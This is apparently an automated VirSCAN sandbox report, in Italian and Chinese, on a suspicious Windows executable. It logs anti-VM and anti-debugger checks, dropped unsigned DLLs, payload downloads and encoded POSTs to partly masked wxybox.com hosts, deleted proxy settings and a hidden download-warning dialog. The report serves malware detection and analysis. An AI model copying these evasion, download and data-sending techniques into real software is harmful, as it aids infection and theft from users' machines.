VirSCAN VirSCAN

1, E' possibile CARICARE qualsiasi file, ma c'è un limite di 20 MB per file.
2, VirSCAN supporta la decompressione Rar/Zip, ma deve essere minore di 20 file.
3, VirSCAN può eseguire la scansione dei file compressi con password 'infected' o 'virus'.

Lingua
Carico del server
Server Load

Informazioni sui file
Valutazione di sicurezza:50
Elenco dei comportamenti
Informazioni di base
MD5:492936e12373be4b7957465e52fe2c5b
Tipo di file:EXE
Società di produzione:QQ:285774054
versione:4.6.5.0---4.6.5.0
Informazioni sulla shell o sul compilatore:COMPILER:Elan
Comportamento chiave
Descrizione del comportamento:探测 Virtual PC是否存在
Per ulteriori informazioni:N/A
Descrizione del comportamento:尝试打开调试器或监控软件的驱动设备对象
Per ulteriori informazioni:\??\NTICE
Descrizione del comportamento:获取TickCount值
Per ulteriori informazioni:TickCount = 227643, SleepMilliseconds = 300.
TickCount = 231890, SleepMilliseconds = 2000.
TickCount = 231906, SleepMilliseconds = 2000.
TickCount = 231937, SleepMilliseconds = 2000.
TickCount = 231953, SleepMilliseconds = 2000.
TickCount = 240093, SleepMilliseconds = 10000.
TickCount = 234187, SleepMilliseconds = 4000.
TickCount = 232203, SleepMilliseconds = 2000.
TickCount = 232250, SleepMilliseconds = 2000.
TickCount = 232265, SleepMilliseconds = 2000.
TickCount = 232281, SleepMilliseconds = 2000.
TickCount = 232296, SleepMilliseconds = 2000.
TickCount = 240312, SleepMilliseconds = 10000.
TickCount = 232484, SleepMilliseconds = 2000.
TickCount = 234500, SleepMilliseconds = 4000.
Descrizione del comportamento:设置特殊文件属性
Per ulteriori informazioni:C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll
Descrizione del comportamento:设置特殊文件夹属性
Per ulteriori informazioni:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Descrizione del comportamento:直接获取CPU时钟
Per ulteriori informazioni:EAX = 0xdf800350, EDX = 0x000000bb
EAX = 0xdf80039c, EDX = 0x000000bb
EAX = 0xdf8003e8, EDX = 0x000000bb
EAX = 0xdf800434, EDX = 0x000000bb
EAX = 0xdf800480, EDX = 0x000000bb
EAX = 0xdf8004cc, EDX = 0x000000bb
EAX = 0xdf800518, EDX = 0x000000bb
EAX = 0xdf800564, EDX = 0x000000bb
EAX = 0xdf8005b0, EDX = 0x000000bb
EAX = 0xdf8005fc, EDX = 0x000000bb
Descrizione del comportamento:查找反病毒常用工具窗口
Per ulteriori informazioni:NtUserFindWindowEx: [Class,Window] = [Regmonclass,]
NtUserFindWindowEx: [Class,Window] = [Filemonclass,]
Descrizione del comportamento:VMWare特殊指令检测虚拟机
Per ulteriori informazioni:N/A
Comportamento del processo
Descrizione del comportamento:创建本地线程
Per ulteriori informazioni:TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 2968, StartAddress = 00E555A5, Parameter = 001D5E58
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 2972, StartAddress = 00E555A5, Parameter = 001D5E58
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 2976, StartAddress = 00E555A5, Parameter = 001D5E58
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 2980, StartAddress = 00E555A5, Parameter = 001D5E58
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 2984, StartAddress = 00E555A5, Parameter = 001D5D78
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 2988, StartAddress = 00E555A5, Parameter = 001D5F08
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 2992, StartAddress = 00E555A5, Parameter = 001D5F08
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 2996, StartAddress = 00E555A5, Parameter = 001D5F08
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 3160, StartAddress = 00E555A5, Parameter = 001D5F08
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 3164, StartAddress = 00E555A5, Parameter = 001D5E58
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 3168, StartAddress = 00E555A5, Parameter = 001D5E58
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 3272, StartAddress = 77DC845A, Parameter = 00000000
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 3304, StartAddress = 7C947EBB, Parameter = 00000000
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 3308, StartAddress = 7C930230, Parameter = 00000000
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 3312, StartAddress = 77E56C7D, Parameter = 0022E018
Descrizione del comportamento:创建新文件进程
Per ulteriori informazioni:[0x00000b5c]ImagePath = C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll, CmdLine = "C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll"
Descrizione del comportamento:枚举进程
Per ulteriori informazioni:N/A
Comportamento del file
Descrizione del comportamento:创建文件
Per ulteriori informazioni:C:\kkwn.ini
C:\WINDOWS\Sockee.dll
C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.1
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.2
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.3
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.4
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.5
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.6
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.7
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.8
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.9
C:\Documents and Settings\Administrator\Local Settings\Temp\~xduan.10
C:\Documents and Settings\Administrator\Local Settings\Temp\~mubiao.10
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\l2gs[1]
Descrizione del comportamento:创建可执行文件
Per ulteriori informazioni:C:\WINDOWS\Sockee.dll
C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.4
C:\Documents and Settings\Administrator\Local Settings\%temp%\SoftXLic.dll
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.10
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.11
Descrizione del comportamento:删除文件
Per ulteriori informazioni:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\l2gs[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\navcancl[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\ErrorPageTemplate[2]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\errorPageStrings[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\httpErrorPagesScripts[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\background_gradient[3]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\info_48[2]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IUKHR8T2\bullet[2]
C:\Documents and Settings\Administrator\Local Settings\%temp%\SoftXLic.dll
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IUKHR8T2\~temp[1].j
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IUKHR8T2\~temp[1].f
Descrizione del comportamento:覆盖已有文件
Per ulteriori informazioni:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\navcancl[2]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\ErrorPageTemplate[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\errorPageStrings[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\httpErrorPagesScripts[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\background_gradient[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\info_48[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\bullet[1]
Descrizione del comportamento:查找文件
Per ulteriori informazioni:FileName = C:\kkwn.ini
FileName = C:\Documents and Settings\Administrator\Local Settings\Temp
FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%
FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll
FileName = c:\*.log
FileName = C:\Documents and Settings
FileName = C:\Documents and Settings\Administrator
FileName = C:\Documents and Settings\Administrator\Local Settings
FileName = C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\*.pbk
FileName = C:\WINDOWS\system32\Ras\*.pbk
FileName = C:\Documents and Settings\Administrator\Application Data\Microsoft\Network\Connections\Pbk\*.pbk
FileName = C:\WINDOWS
FileName = C:\WINDOWS\system32
FileName = C:\WINDOWS\system32\urlmon.dll
FileName = C:\WINDOWS\system32\ieframe.dll
Descrizione del comportamento:设置特殊文件属性
Per ulteriori informazioni:C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll
Descrizione del comportamento:设置特殊文件夹属性
Per ulteriori informazioni:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Descrizione del comportamento:修改文件内容
Per ulteriori informazioni:C:\kkwn.ini ---> Offset = 0
C:\kkwn.ini ---> Offset = 43
C:\kkwn.ini ---> Offset = 53
C:\WINDOWS\Sockee.dll ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.1 ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.2 ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.3 ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.4 ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.5 ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.6 ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.7 ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.8 ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.9 ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~xduan.10 ---> Offset = 0
Comportamento di rete
Descrizione del comportamento:下载文件
Per ulteriori informazioni:C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.10
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.11
Descrizione del comportamento:连接指定站点
Per ulteriori informazioni:InternetConnectA: ServerName = gs****om, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000
InternetConnectA: ServerName = 25****om, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0010, Flags = 0x00000000
WinHttpConnect: ServerName = kk****om, PORT = 80, UserName = , Password = , hSession = 0x06814000, hConnect = 0x06814100, Flags = 0x00000000
WinHttpConnect: ServerName = kk****om, PORT = 80, UserName = , Password = , hSession = 0x06814000, hConnect = 0x06814200, Flags = 0x00000000
InternetConnectA: ServerName = gs****om, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0010, Flags = 0x00000000
Descrizione del comportamento:打开HTTP连接
Per ulteriori informazioni:InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489), hSession = 0x00cc0004
WinHttpOpen: UserAgent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; 468559416), hSession = 0x06814000
WinHttpOpen: UserAgent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; 575329519), hSession = 0x06814000
WinHttpOpen: UserAgent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; 658160780), hSession = 0x06814000
WinHttpOpen: UserAgent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; 676527751), hSession = 0x06814000
Descrizione del comportamento:建立到一个指定的套接字连接
Per ulteriori informazioni:URL: gs****om, IP: **.133.40.**:80, SOCKET = 0x00000398
URL: gs****om, IP: **.133.40.**:80, SOCKET = 0x00000434
URL: 25****om, IP: **.133.40.**:80, SOCKET = 0x000004f0
URL: 25****om, IP: **.133.40.**:80, SOCKET = 0x000004f4
URL: kk****om, IP: **.133.40.**:80, SOCKET = 0x00000548
URL: gs****om, IP: **.133.40.**:80, SOCKET = 0x0000048c
URL: kk****om, IP: **.133.40.**:80, SOCKET = 0x00000598
Descrizione del comportamento:读取网络文件
Per ulteriori informazioni:hFile = 0x00cc000c, BytesToRead =4096, BytesRead = 4096.
hFile = 0x00cc0014, BytesToRead =4096, BytesRead = 4096.
Descrizione del comportamento:发送HTTP包
Per ulteriori informazioni:GET /l2gs/ HTTP/1.1 Accept: */* Accept-Language: zh-cn Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: gs****om Connection: Keep-Alive
GET /~temp.j HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: 25****om Connection: Keep-Alive
GET /~temp.f HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: 25****om Connection: Keep-Alive
POST /kss_io/io.php?v=10&b=1&s=10000010&e=get&kstoken=69518496564 HTTP/1.1 Cookie: kstoken=69518496564 Accept: */* Accept-Language: zh-cn Cache-Control: no-cache Referer: http://kk.wxybox.com/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; 468559416) Host: kk****om Content-Length: 106 Connection: Keep-Alive o=_Data6F4qkA2d2KRntp4PlxthYBLPICDmYQ7Q3VuAhK4Tkjt6t556napXCckCN_2DphU2iz8qpiZ4SRbzCR71HgvHVgP3cyntjTmsdZx
POST /kss_io/io.php?v=10&b=1&s=10000010&e=get&kstoken=79215599375 HTTP/1.1 Cookie: kstoken=79215599375 Accept: */* Accept-Language: zh-cn Cache-Control: no-cache Referer: http://kk.wxybox.com/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; 575329519) Host: kk****om Content-Length: 106 Connection: Keep-Alive o=_Data6F4qkA2d2KRntp4PlxthYBLPICDmYQ7Q3VuAhK4Tkjt6t556napXCckCN_2DphU2iz8qpiZ4SRbzCR71HgvHVgP3cyntjTmsdZx
GET /l2gs/ HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/msword, */* Accept-Language: zh-cn Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: gs****om Connection: Keep-Alive
POST /kss_io/io.php?v=10&b=1&s=10000010&kstoken=50688600157 HTTP/1.1 Cookie: kstoken=50688600157 Accept: */* Accept-Language: zh-cn Cache-Control: no-cache Referer: http://kk.wxybox.com/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; 658160780) Host: kk****om Content-Length: 570 Connection: Keep-Alive o=_Data442H9|||RTrhO3uHxoJRvd1H3f4cIRzg0f8jcLgiuDZ|cfMk6nJSTHG38MtN2AShzjbrqvezPRur0_50GRDNZDvz3LY|wNuj6fzyvS8yZDy46Zmf5UvDU7ah2Dhz1KpH6McV6ZWP0ZXi97bkkHij8|235qN66K4jzfXc5R5yUWPiGdn3gfXpdoG4vK1wuT5q6kgiOjf3coiPxUUp9TTPqHWF7o|hvMV7z8GC3Wl02d2fPdYjRqTSyrqP2fQ0JSPuInFPPHi7Rj6r1k9FwZgPvTZyOjd3TIuHkI2DP3M|SHnpRyRs2oh0Jv7R3dbzGkoNO83P3nnR1bS3qpW39_3|kMQqSRoP3TBNuTKF63BuqIARz8_gqMu0yZI0Rrj73RsN7jBWfDwCcTmfSqtVzpf0xITcvR6|3_zQIDVqdkayPTJQGbggRMHDyHkcI|qyzpiDuEkSxWBrx3RWd7239M_N037QwHp7wEjq7IWCcU8zSTFkGRj|6dr6fUarzE9wuUX|TdR467GNTfhRIN8cunHrcvTfMp8W1ACN0fwHUReF5Ej|3DXVSvE
POST /kss_io/io.php?v=10&b=1&s=10000010&kstoken=77256671577 HTTP/1.1 Cookie: kstoken=77256671577 Accept: */* Accept-Language: zh-cn Cache-Control: no-cache Referer: http://kk.wxybox.com/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; 676527751) Host: kk****om Content-Length: 570 Connection: Keep-Alive o=_Data442H9|||RTrhO3uHxoJRvd1H3f4cIRzg0f8jcLgiuDZ|cfMk6nJSTHG38MtN2AShzjbrqvezPRur0_50GRDNZDvz3LY|wNuj6fzyvS8yZDy46Zmf5UvDU7ah2Dhz1KpH6McV6ZWP0ZXi97bkkHij8|235qN66K4jzfXc5R5yUWPiGdn3gfXpdoG4vK1wuT5q6kgiOjf3coiPxUUp9TTPqHWF7o|hvMV7z8GC3Wl02d2fPdYjRqTSyrqP2fQ0JSPuInFPPHi7Rj6r1k9FwZgPvTZyOjd3TIuHkI2DP3M|SHnpRyRs2oh0Jv7R3dbzGkoNO83P3nnR1bS3qpW39_3|kMQqSRoP3TBNuTKF63BuqIARz8_gqMu0yZI0Rrj73RsN7jBWfDwCcTmfSqtVzpf0xITcvR6|3_zQIDVqdkayPTJQGbggRMHDyHkcI|qyzpiDuEkSxWBrx3RWd7239M_N037QwHp7wEjq7IWCcU8zSTFkGRj|6dr6fUarzE9wuUX|TdR467GNTfhRIN8cunHrcvTfMp8W1ACN0fwHUReF5Ej|3DXVSvE
Descrizione del comportamento:打开HTTP请求
Per ulteriori informazioni:HttpOpenRequestA: gs****om:80/l2gs/, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400000
HttpOpenRequestA: gs****om:80/l2gs/, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: 25****om:80/~temp.j, hConnect = 0x00cc0010, hRequest = 0x00cc0014, Verb: GET, Referer: , Flags = 0x00400000
HttpOpenRequestA: 25****om:80/~temp.f, hConnect = 0x00cc0010, hRequest = 0x00cc0014, Verb: GET, Referer: , Flags = 0x00400000
WinHttpOpenRequest: kk****om:80/kss_io/io.php?v=10&b=1&s=10000010&e=get&kstoken=69518496564, hConnect = 0x06814100, hRequest = 0x06d40000, Verb: POST, Referer: , Flags = 0x00000000
WinHttpOpenRequest: kk****om:80/kss_io/io.php?v=10&b=1&s=10000010&e=get&kstoken=79215599375, hConnect = 0x06814200, hRequest = 0x06d40000, Verb: POST, Referer: , Flags = 0x00000000
HttpOpenRequestA: gs****om:80/l2gs/, hConnect = 0x00cc0010, hRequest = 0x00cc0014, Verb: GET, Referer: , Flags = 0x00400000
WinHttpOpenRequest: kk****om:80/kss_io/io.php?v=10&b=1&s=10000010&kstoken=50688600157, hConnect = 0x06814100, hRequest = 0x06d40000, Verb: POST, Referer: , Flags = 0x00000000
WinHttpOpenRequest: kk****om:80/kss_io/io.php?v=10&b=1&s=10000010&kstoken=77256671577, hConnect = 0x06814200, hRequest = 0x06d40000, Verb: POST, Referer: , Flags = 0x00000000
Descrizione del comportamento:按名称获取主机地址
Per ulteriori informazioni:GetAddrInfoW: gs****om
GetAddrInfoW: 25****om
GetAddrInfoW: kk****om
Comportamento del registro
Descrizione del comportamento:修改注册表
Per ulteriori informazioni:\REGISTRY\USER\S-*_CLASSES\Interface\{BBD5FF19-BC8F-B199-B2CD-BF57A85DB906}\
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Descrizione del comportamento:删除注册表键值
Per ulteriori informazioni:\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
Altro comportamento
Descrizione del comportamento:探测 Virtual PC是否存在
Per ulteriori informazioni:N/A
Descrizione del comportamento:创建互斥体
Per ulteriori informazioni:CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-*
Local\ZonesCounterMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
RasPbFile
CritOpMutex
Local\!PrivacIE!SharedMemory!Mutex
MSIMGSIZECacheMutex
MSCTF.Shared.MUTEX.IOH
Descrizione del comportamento:创建事件对象
Per ulteriori informazioni:EventName = DINPUTWINMM
EventName = Global\userenv: User Profile setup event
EventName = MSCTF.SendReceive.Event.IPM.IC
EventName = MSCTF.SendReceiveConection.Event.IPM.IC
EventName = MSCTF.SendReceive.Event.AGL.IC
EventName = MSCTF.SendReceiveConection.Event.AGL.IC
Descrizione del comportamento:检测自身是否被调试
Per ulteriori informazioni:IsDebuggerPresent
Descrizione del comportamento:窗口信息
Per ulteriori informazioni:Pid = 2908, Hwnd=0x104dc, Text = 您想运行或保存此文件吗?, ClassName = Static.
Pid = 2908, Hwnd=0x104e0, Text = 名称:, ClassName = Static.
Pid = 2908, Hwnd=0x104e2, Text = update.exe, ClassName = SysLink.
Pid = 2908, Hwnd=0x104e4, Text = 发行者:, ClassName = Static.
Pid = 2908, Hwnd=0x104e8, Text = 类型:, ClassName = Static.
Pid = 2908, Hwnd=0x104ea, Text = 应用程序, 358KB, ClassName = Static.
Pid = 2908, Hwnd=0x104ec, Text = 从:, ClassName = Static.
Pid = 2908, Hwnd=0x104ee, Text = gs.wxybox.com, ClassName = Static.
Pid = 2908, Hwnd=0x104f0, Text = 运行(&R), ClassName = Button.
Pid = 2908, Hwnd=0x104f2, Text = 保存(&S), ClassName = Button.
Pid = 2908, Hwnd=0x104f4, Text = 取消, ClassName = Button.
Pid = 2908, Hwnd=0x104f6, Text = 打开此类文件前总是询问(&W), ClassName = Button(CheckBox).
Pid = 2908, Hwnd=0x104fc, Text = 来自 Internet 的文件可能对您有所帮助,但此文件类型可能危害您的计算机。如果您不信任其来源,请不要运行或保存该软件。<A>有何风险?</A>, ClassName = SysLink.
Pid = 2908, Hwnd=0x204d8, Text = 文件下载 - 安全警告, ClassName = #32770.
Pid = 2908, Hwnd=0x104a4, Text = 下载完毕, ClassName = Static.
Descrizione del comportamento:打开互斥体
Per ulteriori informazioni:ShimCacheMutex
Local\!IETld!Mutex
Local\WininetStartupMutex
Local\_!MSFTHISTORY!_
Local\c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Local\c:!documents and settings!administrator!cookies!
Local\c:!documents and settings!administrator!local settings!history!history.ie5!
Local\WininetConnectionMutex
Local\WininetProxyRegistryMutex
RasPbFile
CtfmonInstMutexDefaultS-*
Descrizione del comportamento:查找指定窗口
Per ulteriori informazioni:NtUserFindWindowEx: [Class,Window] = [4823-00000029,]
NtUserFindWindowEx: [Class,Window] = [18467-41,]
NtUserFindWindowEx: [Class,Window] = [MS_AutodialMonitor,]
NtUserFindWindowEx: [Class,Window] = [MS_WebCheckMonitor,]
NtUserFindWindowEx: [Class,Window] = [Shell_TrayWnd,]
NtUserFindWindowEx: [Class,Window] = [CicLoaderWndClass,]
Descrizione del comportamento:尝试打开调试器或监控软件的驱动设备对象
Per ulteriori informazioni:\??\NTICE
Descrizione del comportamento:获取TickCount值
Per ulteriori informazioni:TickCount = 227643, SleepMilliseconds = 300.
TickCount = 231890, SleepMilliseconds = 2000.
TickCount = 231906, SleepMilliseconds = 2000.
TickCount = 231937, SleepMilliseconds = 2000.
TickCount = 231953, SleepMilliseconds = 2000.
TickCount = 240093, SleepMilliseconds = 10000.
TickCount = 234187, SleepMilliseconds = 4000.
TickCount = 232203, SleepMilliseconds = 2000.
TickCount = 232250, SleepMilliseconds = 2000.
TickCount = 232265, SleepMilliseconds = 2000.
TickCount = 232281, SleepMilliseconds = 2000.
TickCount = 232296, SleepMilliseconds = 2000.
TickCount = 240312, SleepMilliseconds = 10000.
TickCount = 232484, SleepMilliseconds = 2000.
TickCount = 234500, SleepMilliseconds = 4000.
Descrizione del comportamento:调整进程token权限
Per ulteriori informazioni:SE_LOAD_DRIVER_PRIVILEGE
Descrizione del comportamento:打开事件
Per ulteriori informazioni:HookSwitchHookEnabledEvent
\SECURITY\LSA_AUTHENTICATION_INITIALIZED
Global\Protected.61_-2909
Global\Protected.60_-2909
Global\SvcctrlStartEvent_A3752DX
\INSTALLATION_SECURITY_HOLD
MSFT.VSA.COM.DISABLE.2908
MSFT.VSA.IEC.STATUS.6c736db0
_fCanRegisterWithShellService
CTF.ThreadMIConnectionEvent.000007E8.00000000.0000000F
CTF.ThreadMarshalInterfaceEvent.000007E8.00000000.0000000F
MSCTF.SendReceiveConection.Event.IOH.IC
MSCTF.SendReceive.Event.IOH.IC
CTF.ThreadMIConnectionEvent.000007E8.00000000.00000010
CTF.ThreadMarshalInterfaceEvent.000007E8.00000000.00000010
Descrizione del comportamento:加载新释放的文件
Per ulteriori informazioni:Image: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~temp.4.
Image: C:\Documents and Settings\Administrator\Local Settings\%temp%\SoftXLic.dll.
Descrizione del comportamento:可执行文件签名信息
Per ulteriori informazioni:C:\WINDOWS\Sockee.dll(签名验证: 未通过)
C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll(签名验证: 未通过)
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.4(签名验证: 未通过)
C:\Documents and Settings\Administrator\Local Settings\%temp%\SoftXLic.dll(签名验证: 未通过)
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.10(签名验证: 未通过)
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.11(签名验证: 未通过)
Descrizione del comportamento:调用Sleep函数
Per ulteriori informazioni:[1]: MilliSeconds = 300.
[2]: MilliSeconds = 300.
[1]: MilliSeconds = 2000.
[2]: MilliSeconds = 2000.
[3]: MilliSeconds = 2000.
[4]: MilliSeconds = 2000.
[5]: MilliSeconds = 2000.
[6]: MilliSeconds = 10000.
[7]: MilliSeconds = 4000.
[8]: MilliSeconds = 2000.
[9]: MilliSeconds = 2000.
[10]: MilliSeconds = 2000.
Descrizione del comportamento:隐藏指定窗口
Per ulteriori informazioni:[Window,Class] = [,Button]
[Window,Class] = [,SysLink]
[Window,Class] = [,Static]
[Window,Class] = [文件大小未知,Static]
[Window,Class] = [打开此类文件前总是询问(&W),Button]
[Window,Class] = [发行者:,Static]
Descrizione del comportamento:获取光标位置
Per ulteriori informazioni:CursorPos = (80,18468), SleepMilliseconds = 10000.
CursorPos = (6373,26501), SleepMilliseconds = 2000.
CursorPos = (19208,15725), SleepMilliseconds = 5000.
CursorPos = (11517,29359), SleepMilliseconds = 2000.
CursorPos = (27001,24465), SleepMilliseconds = 2000.
CursorPos = (5744,28146), SleepMilliseconds = 10000.
CursorPos = (23320,16828), SleepMilliseconds = 10000.
CursorPos = (10000,492), SleepMilliseconds = 10000.
CursorPos = (3034,11943), SleepMilliseconds = 10000.
CursorPos = (4866,5437), SleepMilliseconds = 10000.
CursorPos = (32430,14605), SleepMilliseconds = 10000.
CursorPos = (3941,154), SleepMilliseconds = 2000.
CursorPos = (331,12383), SleepMilliseconds = 2000.
